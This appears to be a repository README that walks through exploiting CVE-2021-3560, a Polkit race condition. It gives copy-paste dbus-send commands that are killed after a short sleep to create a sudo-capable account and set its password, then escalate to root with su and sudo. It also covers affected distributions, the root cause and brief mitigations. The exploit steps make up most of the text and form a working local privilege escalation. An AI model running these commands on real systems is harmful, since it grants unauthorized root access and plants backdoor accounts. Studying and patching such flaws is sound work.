Privesc With Seven Years Old Bug
Privilege Escalation via Polkit (CVE-2021-3560)
Overview
This repository provides information on exploiting a seven-year-old privilege escalation vulnerability in Polkit, identified as CVE-2021-3560. This bug allows an unprivileged local user to gain root access using standard Linux command-line tools.
Polkit is a system service used in many Linux distributions to manage privileges. The vulnerability was publicly disclosed on June 3, 2021, and a patch has been released.
Affected Distributions
The vulnerability was introduced in Polkit version 0.113 and affects various distributions:
| Distribution | Vulnerable? |
|---|---|
| RHEL 7 | No |
| RHEL 8 | Yes |
| Fedora 20 (or earlier) | No |
| Fedora 21 (or later) | Yes |
| Debian 10 ("buster") | No |
| Debian Testing ("bullseye") | Yes |
| Ubuntu 18.04 | No |
| Ubuntu 20.04 | Yes |
How Polkit Works
Polkit acts as a permission manager for privileged operations. It determines whether a user is authorized to execute certain actions, either granting immediate approval or requiring authentication via a dialog box.
Commands like pkexec and dbus-send interact with Polkit. The latter is particularly relevant for this exploit.
Exploitation Steps
-
Install necessary packages (if not already installed):
sudo yum install accountsservice gnome-control-center # RHEL-based
sudo apt install accountsservice gnome-control-center # Debian-based -
Measure execution time for a normal user creation attempt:
time dbus-send --system --dest=org.freedesktop.Accounts \
--type=method_call --print-reply \
/org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser \
string:opslinux string:"Opslinux" int32:1 -
Exploit the vulnerability by killing the process at the right moment:
dbus-send --system --dest=org.freedesktop.Accounts \
--type=method_call --print-reply \
/org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser \
string:opslinux string:"Opslinux" int32:1 &
sleep 0.008s ; kill $! -
Check if the user was created:
$ id opslinux
uid=1002(opslinux) gid=1002(opslinux) groups=1002(opslinux),27(sudo)If successful, the user should appear with sudo privileges.
-
Set a password for the new user:
$ openssl passwd -5 'hellodude!'Use the hashed output in the following command:
dbus-send --system --dest=org.freedesktop.Accounts \
--type=method_call --print-reply \
/org/freedesktop/Accounts/User1002 org.freedesktop.Accounts.User.SetPassword \
string:'<HASHED_PASSWORD>' string:GoldenEye &
sleep 0.008s ; kill $! -
Gain root access:
su - opslinux
sudo su
Technical Details
- The vulnerability exists in how Polkit retrieves the UID of a process.
- Killing the
dbus-sendprocess at the right moment makes Polkit treat the request as coming from UID 0 (root). - Exploitation is non-deterministic due to timing variations.
- The bug exists in
polkit_system_bus_name_get_creds_sync(), where errors are improperly handled.
Mitigation
- Update your system:
sudo apt update && sudo apt upgrade # Debian/Ubuntu
sudo yum update # RHEL/Fedora - Manually patch Polkit if updates are unavailable.
- Use SELinux or AppArmor to restrict Polkit actions.
References
Disclaimer: This repository is for educational and research purposes only. Unauthorized exploitation of this vulnerability is illegal and unethical.